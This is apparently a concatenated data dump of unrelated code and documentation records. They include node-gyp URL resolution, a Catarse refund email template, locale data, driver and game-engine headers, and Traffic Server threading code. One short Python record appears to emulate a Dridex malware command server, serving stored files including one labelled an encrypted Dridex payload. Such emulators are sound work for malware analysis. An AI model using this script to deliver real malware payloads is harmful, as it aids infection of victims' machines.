bitsreV3 = /\\/win-(x86|ia32|x64)\\// // io.js v3.x.x shipped with \"ia32\" but should\n // have been \"x86\"\n\n// Captures all the logic required to determine download URLs, local directory and \n// file names. Inputs come from command-line switches (--target, --dist-url),\n// `process.version` and `process.release` where it exists.\nfunction processRelease (argv, gyp, defaultVersion, defaultRelease) {\n var version = (semver.valid(argv[0]) && argv[0]) || gyp.opts.target || defaultVersion\n , versionSemver = semver.parse(version)\n , overrideDistUrl = gyp.opts['dist-url'] || gyp.opts.disturl\n , isDefaultVersion\n , isIojs\n , name\n , distBaseUrl\n , baseUrl\n , libUrl32\n , libUrl64\n , tarballUrl\n , canGetHeaders\n\n if (!versionSemver) {\n // not a valid semver string, nothing we can do\n return { version: version }\n }\n // flatten version into String\n version = versionSemver.version\n\n // defaultVersion should come from process.version so ought to be valid semver\n isDefaultVersion = version === semver.parse(defaultVersion).version\n\n // can't use process.release if we're using --target=x.y.z\n if (!isDefaultVersion)\n defaultRelease = null\n\n if (defaultRelease) {\n // v3 onward, has process.release\n name = defaultRelease.name.replace(/io\\.js/, 'iojs') // remove the '.' for directory naming purposes\n isIojs = name === 'iojs'\n } else {\n // old node or alternative --target=\n // semver.satisfies() doesn't like prerelease tags so test major directly\n isIojs = versionSemver.major >= 1 && versionSemver.major < 4\n name = isIojs ? 'iojs' : 'node'\n }\n\n // check for the nvm.sh standard mirror env variables\n if (!overrideDistUrl) {\n if (isIojs) {\n if (process.env.IOJS_ORG_MIRROR) {\n overrideDistUrl = process.env.IOJS_ORG_MIRROR\n } else if (process.env.NVM_IOJS_ORG_MIRROR) {// remove on next semver-major\n overrideDistUrl = process.env.NVM_IOJS_ORG_MIRROR\n log.warn('download',\n 'NVM_IOJS_ORG_MIRROR is deprecated and will be removed in node-gyp v4, ' +\n 'please use IOJS_ORG_MIRROR')\n }\n } else {\n if (process.env.NODEJS_ORG_MIRROR) {\n overrideDistUrl = process.env.NODEJS_ORG_MIRROR\n } else if (process.env.NVM_NODEJS_ORG_MIRROR) {// remove on next semver-major\n overrideDistUrl = process.env.NVM_NODEJS_ORG_MIRROR\n log.warn('download',\n 'NVM_NODEJS_ORG_MIRROR is deprecated and will be removed in node-gyp v4, ' +\n 'please use NODEJS_ORG_MIRROR')\n }\n }\n }\n\n if (overrideDistUrl)\n log.verbose('download', 'using dist-url', overrideDistUrl)\n\n if (overrideDistUrl)\n distBaseUrl = overrideDistUrl.replace(/\\/+$/, '')\n else\n distBaseUrl = isIojs ? 'https://iojs.org/download/release' : 'https://nodejs.org/dist'\n distBaseUrl += '/v' + version + '/'\n\n // new style, based on process.release so we have a lot of the data we need\n if (defaultRelease && defaultRelease.headersUrl && !overrideDistUrl) {\n baseUrl = url.resolve(defaultRelease.headersUrl, './')\n libUrl32 = resolveLibUrl(name, defaultRelease.libUrl || baseUrl || distBaseUrl, 'x86', versionSemver.major)\n libUrl64 = resolveLibUrl(name, defaultRelease.libUrl || baseUrl || distBaseUrl, 'x64', versionSemver.major)\n\n return {\n version: version,\n semver: versionSemver,\n name: name,\n baseUrl: baseUrl,\n tarballUrl: defaultRelease.headersUrl,\n shasumsUrl: url.resolve(baseUrl, 'SHASUMS256.txt'),\n versionDir: (name !== 'node' ? name + '-' : '') + version,\n libUrl32: libUrl32,\n libUrl64: libUrl64,\n libPath32: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl32).path)),\n libPath64: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl64).path))\n }\n }\n\n // older versions without process.release are captured here and we have to make\n // a lot of assumptions, additionally if you --target=x.y.z then we can't use the\n // current process.release\n\n baseUrl = distBaseUrl\n libUrl32 = resolveLibUrl(name, baseUrl, 'x86', versionSemver.major)\n libUrl64 = resolveLibUrl(name, baseUrl, 'x64', versionSemver.major)\n // making the bold assumption that anything with a version number >3.0.0 will\n // have a *-headers.tar.gz file in its dist location, even some frankenstein\n // custom version\n canGetHeaders = semver.satisfies(versionSemver, headersTarballRange)\n tarballUrl = url.resolve(baseUrl, name + '-v' + version + (canGetHeaders ? '-headers' : '') + '.tar.gz')\n\n return {\n version: version,\n semver: versionSemver,\n name: name,\n baseUrl: baseUrl,\n tarballUrl: tarballUrl,\n shasumsUrl: url.resolve(baseUrl, 'SHASUMS256.txt'),\n versionDir: (name !== 'node' ? name + '-' : '') + version,\n libUrl32: libUrl32,\n libUrl64: libUrl64,\n libPath32: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl32).path)),\n libPath64: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl64).path))\n }\n}\n\nfunction normalizePath (p) {\n return path.normalize(p).replace(/\\\\/g, '/')\n}\n\nfunction resolveLibUrl (name, defaultUrl, arch, versionMajor) {\n var base = url.resolve(defaultUrl, './')\n , hasLibUrl = bitsre.test(defaultUrl) || (versionMajor === 3 && bitsreV3.test(defaultUrl))\n\n if (!hasLibUrl) {\n // let's assume it's a baseUrl then\n if (versionMajor >= 1)\n return url.resolve(base, 'win-' + arch +'/' + name + '.lib')\n // prior to io.js@1.0.0 32-bit node.lib lives in /, 64-bit lives in /x64/\n return url.resolve(base, (arch === 'x64' ? 'x64/' : '') + name + '.lib')\n }\n\n // else we have a proper url to a .lib, just make sure it's the right arch\n return defaultUrl.replace(versionMajor === 3 ? bitsreV3 : bitsre, '/win-' + arch + '/')\n}\n\nmodule.exports = processRelease\n"} {"text": "/*\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage net.consensys.eventeum.integration.mixin;\n\nimport com.fasterxml.jackson.databind.annotation.JsonDeserialize;\n\n@JsonDeserialize(as = SimplePageImpl.class)\npublic interface PageMixIn {\n}\n"} {"text": "- contribution = @notification.contribution\n- details = contribution.details.first\n\n|Olá, #{contribution.user.display_name}!\nbr\nbr\n| Infelizmente o projeto #{link_to(contribution.project.name, project_by_slug_url(permalink: contribution.project.permalink))} que você apoiou não atingiu a meta estabelecida no #{CatarseSettings[:company_name]}.\nbr\nbr\n| Em até 5 dias úteis faremos o reembolso do valor do seu apoio, que virá como crédito na próxima ou \n| subsequente fatura do seu cartão. Assim que o reembolso for feito, você receberá um e-mail de confirmação da operação.\nbr\nbr\np Valor do reembolso: #{number_to_currency details.value}\n\np Data do pedido reembolso: #{details.pending_refund_at.try(:to_date)}\n\np Identificação na fatura do cartão de crédito: “Estorno do Catarse”\n\n= render partial: 'user_notifier/mailer/contact_info'\n"} {"text": "import cv2\n\ndef min_resize(x, size, interpolation=cv2.INTER_LINEAR):\n \"\"\"\n Resize an image so that it is size along the minimum spatial dimension.\n \"\"\"\n w, h = map(float, x.shape[:2])\n if min([w, h]) != size:\n if w <= h:\n x = cv2.resize(x, (int(round((h/w)*size)), int(size)), interpolation=interpolation)\n else:\n x = cv2.resize(x, (int(size), int(round((w/h)*size))), interpolation=interpolation)\n return x"} {"text": "package pkg;\n\npublic final class TestFieldSingleAccess {\n public Integer field;\n\n public final void test() {\n Integer var10000 = this.field;\n if (var10000 != null) {\n System.out.println(var10000);\n }\n\n }\n\n public final void test1() {\n synchronized(this.field) {\n System.out.println('1');\n }\n }\n}\n\nclass 'pkg/TestFieldSingleAccess' {\n method 'test ()V' {\n 1 6\n 5 7\n 8 8\n c 8\n f 11\n }\n\n method 'test1 ()V' {\n 1 14\n 6 14\n 7 15\n a 15\n c 15\n 19 17\n }\n}\n\nLines mapping:\n"} {"text": "---\ndescription: All tasks are filed as issues in github.\n---\n\n# Track and submit issues in Github\n\n## Track issues in Github\n\nWe log all our issues concerning development and documentation for the Ushahidi Platform in the [Platform-repository](https://github.com/ushahidi/platform/issues). Issues marked with [Community-task](https://github.com/ushahidi/platform/labels/Community%20Task) are issues that are up for grabs for any community-member.\n\n## Submit issues in GitHub\n\nTo submit issues in GitHub for the Ushahidi Platform, please go to [https://github.com/ushahidi/platform/issues](https://github.com/ushahidi/platform/issues) and click on the \"New Issue\" button, _or_ follow [this link](https://github.com/ushahidi/platform/issues/new/choose).\n\n[![New Issue button in GitHub](https://user-images.githubusercontent.com/2434401/62314495-8a844200-b469-11e9-8439-27ed03ea43c4.png)](https://user-images.githubusercontent.com/2434401/62314495-8a844200-b469-11e9-8439-27ed03ea43c4.png)\n\nYou will see a list of options for which type of issue you'd like to submit. \n[![Screen Shot 2019-08-01 at 14 36 16](https://user-images.githubusercontent.com/2434401/62314594-c3241b80-b469-11e9-8b62-115ea30cc150.png)](https://user-images.githubusercontent.com/2434401/62314594-c3241b80-b469-11e9-8b62-115ea30cc150.png) \nThe options:\n\n* **Bug report:** If you want to report something that is broken or not working as intended, please file a Bug Report. A good bug report is descriptive and reproducible.\n* **Feature/enhancement request:** Suggest an idea for a new feature or a small enhancement to existing features. This can be something as big as \"Add a new way to import data into the Ushahidi Platform\" or as small as \"Change the font size of the login button to make it easier to use\".\n* **Epic level spec**: this is only used when you want to create a very large request that encompasses multiple tickets and is likely to require a lot of work. It is primarily used by the Ushahidi team to group work together and plan for it, so you can ignore it for now.\n\nFor each of the options, when you click it you will be taken to a screen where you can fill in answers to our questions to submit a new issue. Please take the time to fill in all the required fields, as this will increase the chances that your issue will be understood quickly by both staff and community members, and it will also help us triage it correctly. \n[![Screen Shot 2019-08-01 at 14 44 10](https://user-images.githubusercontent.com/2434401/62315024-d7b4e380-b46a-11e9-9829-b737d9d89217.png)](https://user-images.githubusercontent.com/2434401/62315024-d7b4e380-b46a-11e9-9829-b737d9d89217.png)\n\n**Important:** _Do not add tags to issues unless you are a maintainer._ A maintainer will tag issues during triage, and add any staff or community members that need to be aware of the issue immediately.\n\nOnce you have filled all the requirements for the issue to be submitted, you can click \"Submit new Issue\" and your issue will be created. **This triggers a notification to one Ushahidi staff who will review it as soon as possible.** \n[![Screen Shot 2019-08-01 at 14 47 50](https://user-images.githubusercontent.com/2434401/62315262-5b6ed000-b46b-11e9-993f-6ad654d8e138.png)](https://user-images.githubusercontent.com/2434401/62315262-5b6ed000-b46b-11e9-993f-6ad654d8e138.png)\n\nThank you for reading our guide to submitting a new issue to the Ushahidi Platform. We look forward to hearing from you!\n\n"} {"text": "import base64\nimport os\nfrom os.path import dirname, abspath\n\n################################\nstate_file_mappping = {\n\t0: \"48e79c2413bd1090c3e99bce786bc4b33f0f632d\", #download instruction??\n\t1: \"dfef1067c4c404be770adbfc4c7c23204b69d3bb\", #encrypted Dridex payload\n\t2: \"0f6ed930dfae0b4f093a01cd1838b29756c9aa0c\", #ping response??\n\t3: \"0f6ed930dfae0b4f093a01cd1838b29756c9aa0c\" #ping response??\n}\n################################\n\nscript_directory=dirname(abspath(__file__))\nstate_file=script_directory+\"\\\\state.txt\"\n\ndef print_file_contents(fileName):\n\tfileContents=\"\"\n\twith open(script_directory+\"\\\\\"+fileName, mode='rb') as file:\n\t\tprint base64.b64encode(file.read())\n\nstate=0\nif os.path.isfile(state_file):\n\twith open(state_file) as file:\n\t\tstate=int(file.readline())\n\nprint_file_contents(state_file_mappping.get(state))\n\nwith open(state_file, \"w\") as file:\n\tfile.write(str(state+1))"} {"text": "'use strict';\nangular.module(\"ngLocale\", [], [\"$provide\", function($provide) {\nvar PLURAL_CATEGORY = {ZERO: \"zero\", ONE: \"one\", TWO: \"two\", FEW: \"few\", MANY: \"many\", OTHER: \"other\"};\n$provide.value(\"$locale\", {\n \"DATETIME_FORMATS\": {\n \"AMPMS\": [\n \"PG\",\n \"PTG\"\n ],\n \"DAY\": [\n \"Ahad\",\n \"Isnin\",\n \"Selasa\",\n \"Rabu\",\n \"Khamis\",\n \"Jumaat\",\n \"Sabtu\"\n ],\n \"ERANAMES\": [\n \"S.M.\",\n \"TM\"\n ],\n \"ERAS\": [\n \"S.M.\",\n \"TM\"\n ],\n \"FIRSTDAYOFWEEK\": 0,\n \"MONTH\": [\n \"Januari\",\n \"Februari\",\n \"Mac\",\n \"April\",\n \"Mei\",\n \"Jun\",\n \"Julai\",\n \"Ogos\",\n \"September\",\n \"Oktober\",\n \"November\",\n \"Disember\"\n ],\n \"SHORTDAY\": [\n \"Ahd\",\n \"Isn\",\n \"Sel\",\n \"Rab\",\n \"Kha\",\n \"Jum\",\n \"Sab\"\n ],\n \"SHORTMONTH\": [\n \"Jan\",\n \"Feb\",\n \"Mac\",\n \"Apr\",\n \"Mei\",\n \"Jun\",\n \"Jul\",\n \"Ogo\",\n \"Sep\",\n \"Okt\",\n \"Nov\",\n \"Dis\"\n ],\n \"STANDALONEMONTH\": [\n \"Januari\",\n \"Februari\",\n \"Mac\",\n \"April\",\n \"Mei\",\n \"Jun\",\n \"Julai\",\n \"Ogos\",\n \"September\",\n \"Oktober\",\n \"November\",\n \"Disember\"\n ],\n \"WEEKENDRANGE\": [\n 5,\n 6\n ],\n \"fullDate\": \"dd MMMM y\",\n \"longDate\": \"d MMMM y\",\n \"medium\": \"d MMM y h:mm:ss a\",\n \"mediumDate\": \"d MMM y\",\n \"mediumTime\": \"h:mm:ss a\",\n \"short\": \"d/MM/yy h:mm a\",\n \"shortDate\": \"d/MM/yy\",\n \"shortTime\": \"h:mm a\"\n },\n \"NUMBER_FORMATS\": {\n \"CURRENCY_SYM\": \"$\",\n \"DECIMAL_SEP\": \",\",\n \"GROUP_SEP\": \".\",\n \"PATTERNS\": [\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 3,\n \"minFrac\": 0,\n \"minInt\": 1,\n \"negPre\": \"-\",\n \"negSuf\": \"\",\n \"posPre\": \"\",\n \"posSuf\": \"\"\n },\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 2,\n \"minFrac\": 2,\n \"minInt\": 1,\n \"negPre\": \"-\\u00a4\\u00a0\",\n \"negSuf\": \"\",\n \"posPre\": \"\\u00a4\\u00a0\",\n \"posSuf\": \"\"\n }\n ]\n },\n \"id\": \"ms-latn-bn\",\n \"localeID\": \"ms_Latn_BN\",\n \"pluralCat\": function(n, opt_precision) { return PLURAL_CATEGORY.OTHER;}\n});\n}]);\n"} {"text": "/**************************************************************************\n *\n * Etherboot driver for Level 5 Etherfabric network cards\n *\n * Written by Michael Brown \n *\n * Copyright Fen Systems Ltd. 2005\n * Copyright Level 5 Networks Inc. 2005\n *\n * This software may be used and distributed according to the terms of\n * the GNU General Public License (GPL), incorporated herein by\n * reference. Drivers based on or derived from this code fall under\n * the GPL and must retain the authorship, copyright and license\n * notice.\n *\n **************************************************************************\n */\n\nFILE_LICENCE ( GPL_ANY );\n\n#ifndef EFAB_NIC_H\n#define EFAB_NIC_H\n#include \n#include \n#include \n#include \n#include \n/**************************************************************************\n *\n * Constants and macros\n *\n **************************************************************************\n */\n/* Board IDs. Early boards have no board_type, (e.g. EF1002 and 401/403)\n * But newer boards are getting bigger...\n */\ntypedef enum {\n\tEFAB_BOARD_INVALID = 0, /* Early boards do not have board rev. info. */\n\tEFAB_BOARD_SFE4001 = 1,\n\tEFAB_BOARD_SFE4002 = 2,\n\tEFAB_BOARD_SFE4003 = 3,\n\t/* Insert new types before here */\n\tEFAB_BOARD_MAX\n} efab_board_type;\n\n/* PHY types. */\ntypedef enum {\n\tPHY_TYPE_AUTO = 0, /* on development board detect between CX4 & alaska */\n\tPHY_TYPE_CX4_RTMR = 1,\n\tPHY_TYPE_1GIG_ALASKA = 2,\n\tPHY_TYPE_10XPRESS = 3,\n\tPHY_TYPE_XFP = 4,\n\tPHY_TYPE_CX4 = 5,\n\tPHY_TYPE_PM8358 = 6,\n} phy_type_t;\n\n/**************************************************************************\n *\n * Hardware data structures and sizing\n *\n **************************************************************************\n */\n\n#define dma_addr_t unsigned long\ntypedef efab_qword_t falcon_rx_desc_t;\ntypedef efab_qword_t falcon_tx_desc_t;\ntypedef efab_qword_t falcon_event_t;\n\n#define EFAB_BUF_ALIGN\t\t4096\n#define EFAB_RXD_SIZE\t\t512\n#define EFAB_TXD_SIZE\t\t512\n#define EFAB_EVQ_SIZE\t\t512\n\n#define EFAB_NUM_RX_DESC 16\n#define EFAB_RX_BUF_SIZE\t1600\n\n/**************************************************************************\n *\n * Data structures\n *\n **************************************************************************\n */\n\nstruct efab_nic;\n\n/* A buffer table allocation backing a tx dma, rx dma or eventq */\nstruct efab_special_buffer {\n\tdma_addr_t dma_addr;\n\tint id;\n};\n\n/* A TX queue */\nstruct efab_tx_queue {\n\t/* The hardware ring */\n\tfalcon_tx_desc_t *ring;\n\n\t/* The software ring storing io_buffers. */\n\tstruct io_buffer *buf[EFAB_TXD_SIZE];\n\n\t/* The buffer table reservation pushed to hardware */\n\tstruct efab_special_buffer entry;\n\n\t/* Software descriptor write ptr */\n\tunsigned int write_ptr;\n\n\t/* Hardware descriptor read ptr */\n\tunsigned int read_ptr;\n};\n\n/* An RX queue */\nstruct efab_rx_queue {\n\t/* The hardware ring */\n\tfalcon_rx_desc_t *ring;\n\n\t/* The software ring storing io_buffers */\n\tstruct io_buffer *buf[EFAB_NUM_RX_DESC];\n\n\t/* The buffer table reservation pushed to hardware */\n\tstruct efab_special_buffer entry;\n\n\t/* Descriptor write ptr, into both the hardware and software rings */\n\tunsigned int write_ptr;\n\n\t/* Hardware completion ptr */\n\tunsigned int read_ptr;\n};\n\n/* An event queue */\nstruct efab_ev_queue {\n\t/* The hardware ring to push to hardware.\n\t * Must be the first entry in the structure */\n\tfalcon_event_t *ring;\n\n\t/* The buffer table reservation pushed to hardware */\n\tstruct efab_special_buffer entry;\n\n\t/* Pointers into the ring */\n\tunsigned int read_ptr;\n};\n\nstruct efab_mac_operations {\n\tint ( * init ) ( struct efab_nic *efab );\n};\n\nstruct efab_phy_operations {\n\tint ( * init ) ( struct efab_nic *efab );\n\tunsigned int mmds;\n};\n\nstruct efab_board_operations {\n\tint ( * init ) ( struct efab_nic *efab );\n\tvoid ( * fini ) ( struct efab_nic *efab );\n};\n\nstruct efab_nic {\n\tstruct net_device *netdev;\n\tint pci_revision;\n\tint is_asic;\n\n\t/* I2C bit-bashed interface */\n\tstruct i2c_bit_basher i2c_bb;\n\n\t/** SPI bus and devices, and the user visible NVO area */\n\tstruct spi_bus spi_bus;\n\tstruct spi_device spi_flash;\n\tstruct spi_device spi_eeprom;\n\tstruct spi_device *spi;\n\tstruct nvo_block nvo;\n\n\t/** Board, MAC, and PHY operations tables */\n\tstruct efab_board_operations *board_op;\n\tstruct efab_mac_operations *mac_op;\n\tstruct efab_phy_operations *phy_op;\n\n\t/* PHY and board types */\n\tint phy_addr;\n\tint phy_type;\n\tint phy_10g;\n\tint board_type;\n\n\t/** Memory and IO base */\n\tvoid *membase;\n\tunsigned int iobase;\n\n\t/* Buffer table allocation head */\n\tint buffer_head;\n\n\t/* Queues */\n\tstruct efab_rx_queue rx_queue;\n\tstruct efab_tx_queue tx_queue;\n\tstruct efab_ev_queue ev_queue;\n\n\t/** MAC address */\n\tuint8_t mac_addr[ETH_ALEN];\n\t/** GMII link options */\n\tunsigned int link_options;\n\t/** Link status */\n\tint link_up;\n\n\t/** INT_REG_KER */\n\tefab_oword_t int_ker __attribute__ (( aligned ( 16 ) ));\n};\n#endif /* EFAB_NIC_H */\n\n"} {"text": "/****************************************************************************\nCopyright (c) 2010-2012 cocos2d-x.org\nCopyright (c) 2009-2010 Ricardo Quesada\nCopyright (c) 2011 Zynga Inc.\n\nhttp://www.cocos2d-x.org\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n****************************************************************************/\n#ifndef __CCTMX_TILE_MAP_H__\n#define __CCTMX_TILE_MAP_H__\n\n#include \"base_nodes/CCNode.h\"\n#include \"CCTMXObjectGroup.h\"\n\nNS_CC_BEGIN\n\nclass CCTMXObjectGroup;\nclass CCTMXLayer;\nclass CCTMXLayerInfo;\nclass CCTMXTilesetInfo;\nclass CCTMXMapInfo;\n\n/**\n * @addtogroup tilemap_parallax_nodes\n * @{\n */\n\n/** Possible orientations of the TMX map */\nenum\n{\n /** Orthogonal orientation */\n CCTMXOrientationOrtho,\n\n /** Hexagonal orientation */\n CCTMXOrientationHex,\n\n /** Isometric orientation */\n CCTMXOrientationIso,\n};\n\n/** @brief CCTMXTiledMap knows how to parse and render a TMX map.\n\nIt adds support for the TMX tiled map format used by http://www.mapeditor.org\nIt supports isometric, hexagonal and orthogonal tiles.\nIt also supports object groups, objects, and properties.\n\nFeatures:\n- Each tile will be treated as an CCSprite\n- The sprites are created on demand. They will be created only when you call \"layer->tileAt(position)\"\n- Each tile can be rotated / moved / scaled / tinted / \"opaqued\", since each tile is a CCSprite\n- Tiles can be added/removed in runtime\n- The z-order of the tiles can be modified in runtime\n- Each tile has an anchorPoint of (0,0)\n- The anchorPoint of the TMXTileMap is (0,0)\n- The TMX layers will be added as a child\n- The TMX layers will be aliased by default\n- The tileset image will be loaded using the CCTextureCache\n- Each tile will have a unique tag\n- Each tile will have a unique z value. top-left: z=1, bottom-right: z=max z\n- Each object group will be treated as an CCMutableArray\n- Object class which will contain all the properties in a dictionary\n- Properties can be assigned to the Map, Layer, Object Group, and Object\n\nLimitations:\n- It only supports one tileset per layer.\n- Embedded images are not supported\n- It only supports the XML format (the JSON format is not supported)\n\nTechnical description:\nEach layer is created using an CCTMXLayer (subclass of CCSpriteBatchNode). If you have 5 layers, then 5 CCTMXLayer will be created,\nunless the layer visibility is off. In that case, the layer won't be created at all.\nYou can obtain the layers (CCTMXLayer objects) at runtime by:\n- map->getChildByTag(tag_number); // 0=1st layer, 1=2nd layer, 2=3rd layer, etc...\n- map->layerNamed(name_of_the_layer);\n\nEach object group is created using a CCTMXObjectGroup which is a subclass of CCMutableArray.\nYou can obtain the object groups at runtime by:\n- map->objectGroupNamed(name_of_the_object_group);\n\nEach object is a CCTMXObject.\n\nEach property is stored as a key-value pair in an CCMutableDictionary.\nYou can obtain the properties at runtime by:\n\nmap->propertyNamed(name_of_the_property);\nlayer->propertyNamed(name_of_the_property);\nobjectGroup->propertyNamed(name_of_the_property);\nobject->propertyNamed(name_of_the_property);\n\n@since v0.8.1\n*/\nclass CC_DLL CCTMXTiledMap : public CCNode\n{\n /** the map's size property measured in tiles */\n CC_SYNTHESIZE_PASS_BY_REF(CCSize, m_tMapSize, MapSize);\n /** the tiles's size property measured in pixels */\n CC_SYNTHESIZE_PASS_BY_REF(CCSize, m_tTileSize, TileSize);\n /** map orientation */\n CC_SYNTHESIZE(int, m_nMapOrientation, MapOrientation);\n /** object groups */\n CC_PROPERTY(CCArray*, m_pObjectGroups, ObjectGroups);\n /** properties */\n CC_PROPERTY(CCDictionary*, m_pProperties, Properties);\npublic:\n CCTMXTiledMap();\n virtual ~CCTMXTiledMap();\n\n /** creates a TMX Tiled Map with a TMX file.\n @deprecated: This interface will be deprecated sooner or later.\n */\n CC_DEPRECATED_ATTRIBUTE static CCTMXTiledMap* tiledMapWithTMXFile(const char *tmxFile);\n\n /** initializes a TMX Tiled Map with a TMX formatted XML string and a path to TMX resources \n @deprecated: This interface will be deprecated sooner or later.\n */\n CC_DEPRECATED_ATTRIBUTE static CCTMXTiledMap* tiledMapWithXML(const char* tmxString, const char* resourcePath);\n\n /** creates a TMX Tiled Map with a TMX file.*/\n static CCTMXTiledMap* create(const char *tmxFile);\n\n /** initializes a TMX Tiled Map with a TMX formatted XML string and a path to TMX resources */\n static CCTMXTiledMap* createWithXML(const char* tmxString, const char* resourcePath);\n\n /** initializes a TMX Tiled Map with a TMX file */\n bool initWithTMXFile(const char *tmxFile);\n\n /** initializes a TMX Tiled Map with a TMX formatted XML string and a path to TMX resources */\n bool initWithXML(const char* tmxString, const char* resourcePath);\n\n /** return the TMXLayer for the specific layer */\n CCTMXLayer* layerNamed(const char *layerName);\n\n /** return the TMXObjectGroup for the specific group */\n CCTMXObjectGroup* objectGroupNamed(const char *groupName);\n\n /** return the value for the specific property name */\n CCString *propertyNamed(const char *propertyName);\n\n /** return properties dictionary for tile GID */\n CCDictionary* propertiesForGID(int GID);\n\nprivate:\n CCTMXLayer * parseLayer(CCTMXLayerInfo *layerInfo, CCTMXMapInfo *mapInfo);\n CCTMXTilesetInfo * tilesetForLayer(CCTMXLayerInfo *layerInfo, CCTMXMapInfo *mapInfo);\n void buildWithMapInfo(CCTMXMapInfo* mapInfo);\nprotected:\n //! tile properties\n CCDictionary* m_pTileProperties;\n\n};\n\n// end of tilemap_parallax_nodes group\n/// @}\n\nNS_CC_END\n\n#endif //__CCTMX_TILE_MAP_H__\n\n\n"} {"text": "/** @file\n\n A brief file description\n\n @section license License\n\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n */\n\n/****************************************************************************\n\n Basic Threads\n\n\n\n**************************************************************************/\n#include \"P_EventSystem.h\"\n#include \"tscore/ink_string.h\"\n\n///////////////////////////////////////////////\n// Common Interface impl //\n///////////////////////////////////////////////\n\nink_hrtime Thread::cur_time = ink_get_hrtime_internal();\ninkcoreapi ink_thread_key Thread::thread_data_key;\n\nnamespace\n{\nstatic bool initialized ATS_UNUSED = ([]() -> bool {\n // File scope initialization goes here.\n ink_thread_key_create(&Thread::thread_data_key, nullptr);\n return true;\n})();\n}\n\nThread::Thread()\n{\n mutex = new_ProxyMutex();\n MUTEX_TAKE_LOCK(mutex, static_cast(this));\n mutex->nthread_holding += THREAD_MUTEX_THREAD_HOLDING;\n}\n\nThread::~Thread()\n{\n ink_release_assert(mutex->thread_holding == static_cast(this));\n\n if (ink_thread_getspecific(Thread::thread_data_key) == this) {\n // Clear pointer to this object stored in thread-specific data by set_specific.\n //\n ink_thread_setspecific(Thread::thread_data_key, nullptr);\n }\n\n mutex->nthread_holding -= THREAD_MUTEX_THREAD_HOLDING;\n MUTEX_UNTAKE_LOCK(mutex, static_cast(this));\n}\n\n///////////////////////////////////////////////\n// Unix & non-NT Interface impl //\n///////////////////////////////////////////////\n\nstruct thread_data_internal {\n ThreadFunction f; ///< Function to execute in the thread.\n Thread *me; ///< The class instance.\n char name[MAX_THREAD_NAME_LENGTH]; ///< Name for the thread.\n};\n\nstatic void *\nspawn_thread_internal(void *a)\n{\n auto *p = static_cast(a);\n\n p->me->set_specific();\n ink_set_thread_name(p->name);\n\n if (p->f) {\n p->f();\n } else {\n p->me->execute();\n }\n\n delete p;\n return nullptr;\n}\n\nvoid\nThread::start(const char *name, void *stack, size_t stacksize, ThreadFunction const &f)\n{\n auto *p = new thread_data_internal{f, this, \"\"};\n\n ink_zero(p->name);\n ink_strlcpy(p->name, name, MAX_THREAD_NAME_LENGTH);\n if (stacksize == 0) {\n stacksize = DEFAULT_STACKSIZE;\n }\n ink_thread_create(&tid, spawn_thread_internal, p, 0, stacksize, stack);\n}\n"} {"text": "/*\nThis file is part of the iText (R) project.\nCopyright (c) 1998-2020 iText Group NV\nAuthors: Bruno Lowagie, Paulo Soares, et al.\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License version 3\nas published by the Free Software Foundation with the addition of the\nfollowing permission added to Section 15 as permitted in Section 7(a):\nFOR ANY PART OF THE COVERED WORK IN WHICH THE COPYRIGHT IS OWNED BY\nITEXT GROUP. ITEXT GROUP DISCLAIMS THE WARRANTY OF NON INFRINGEMENT\nOF THIRD PARTY RIGHTS\n\nThis program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY\nor FITNESS FOR A PARTICULAR PURPOSE.\nSee the GNU Affero General Public License for more details.\nYou should have received a copy of the GNU Affero General Public License\nalong with this program; if not, see http://www.gnu.org/licenses or write to\nthe Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,\nBoston, MA, 02110-1301 USA, or download the license from the following URL:\nhttp://itextpdf.com/terms-of-use/\n\nThe interactive user interfaces in modified source and object code versions\nof this program must display Appropriate Legal Notices, as required under\nSection 5 of the GNU Affero General Public License.\n\nIn accordance with Section 7(b) of the GNU Affero General Public License,\na covered work must retain the producer line in every PDF that is created\nor manipulated using iText.\n\nYou can be released from the requirements of the license by purchasing\na commercial license. Buying such a license is mandatory as soon as you\ndevelop commercial activities involving the iText software without\ndisclosing the source code of your own 